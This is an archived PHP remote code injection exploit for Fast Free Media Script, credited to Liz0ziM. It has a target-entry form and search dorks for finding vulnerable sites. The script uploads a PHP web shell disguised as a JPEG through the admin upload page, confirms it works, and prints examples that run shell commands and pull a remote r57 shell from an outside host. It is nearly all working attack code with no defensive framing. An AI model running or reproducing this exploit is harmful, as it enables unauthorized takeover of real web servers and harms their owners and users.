Home / os / win10

fastfree-rfi.txt

Posted on 09 June 2008

<?php
error_reporting("E_ALL");
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function yolla($host,$paket)
{
global $veri;
$ac=fsockopen(gethostbyname($host),80);
if (!$ac) {
echo 'Unable to connect to server '.$host.':80'; exit;//Baðlanamaz ise
}
fputs($ac,$paket);

$veri="";
while (!feof($ac)) {
$veri.=fread($ac,1);

}
fclose($ac);
}

?>
<h2>Fast Free Media Script Remote Code Ýnjection Exploit</h2>
<p>Coded By Liz0ziM</p>
<p>Web:<a href="http://www.biyosecurity.com" target="_blank">www.biyosecurity.com</a> </p>
<p>Dork:"Powered by FastFreeMedia.com" &  inurl:cat-1-p0.html  &amp; inurl:page.php?page=topvids & inurl:page.php?page=topgames </p>
<form method="POST" action="">
<p>TARGET HOST:
<input name="host" type="text" />
Example:<strong>www.sexwhispers.com</strong></p>
<p>TARGET PATH:   <input name="klasor" type="text" />
Example:<strong>/</strong> or <strong>/scriptpath/</strong> </p>
<p>ADMÝN PATH:   <select name="admin"><option value="admincp">admincp</option><option value="admin">admin</option> </select>
</p>
<p><input name="yolla" type="submit" value="Send" /></p>
</form><br />
<? if($_POST[yolla]){

$host=$_POST[host];
$klasor=$_POST[klasor];
$admin=$_POST[admin];
$p=$klasor.$admin."/uploadfiles.php";
echo '<font color="red"><b>Sending Exploit..</b></font><br>';
sleep(5);
$data='
-----------------------------17459113492913
Content-Disposition: form-data; name="biyosecurity"; filename="bst.php"
Content-Type: image/jpeg;

<?php error_reporting(0); set_time_limit(0);  echo "biyosecurity"; eval(stripslashes(urldecode($_GET[liz0]))); ?>
-----------------------------17459113492913

';
$paket ="POST ".$p." HTTP/1.0
";
$paket.="Content-Type: multipart/form-data; boundary=---------------------------17459113492913
";
$paket.="Host: ".$host."
";
$paket.="Content-Length: ".strlen($data)."
";
$paket.="Connection: close

";
$paket.=$data;
yolla($host,$paket);

sleep(5);
$packet ="GET /media/upload/bst.php HTTP/1.0
";
$packet.="Host: ".$host."
";
$packet.="Connection: Close

";
yolla($host,$packet);
if (eregi("biyosecurity",$veri))
{
$mesaj='
<font color="green">Exploit succeeded...</font>
<br>
<b>insert evil code :</b>http://'.$host.$klasor.'media/upload/bst.php
<br>
<b>Example:</b> http://'.$host.$klasor.'media/upload/bst.php?liz0=include($_GET[x]);&x=http://www.r57.li/r57.txt?
<br>
<b>Example2:</b> http://'.$host.$klasor.'media/upload/bst.php?liz0=passthru($_GET[x]);&x=ls
';

}
else
{
$mesaj='<font color="red">Exploit Failed !</font>';
}

}

echo $mesaj;
?>

 

TOP

Malware :

Exploits :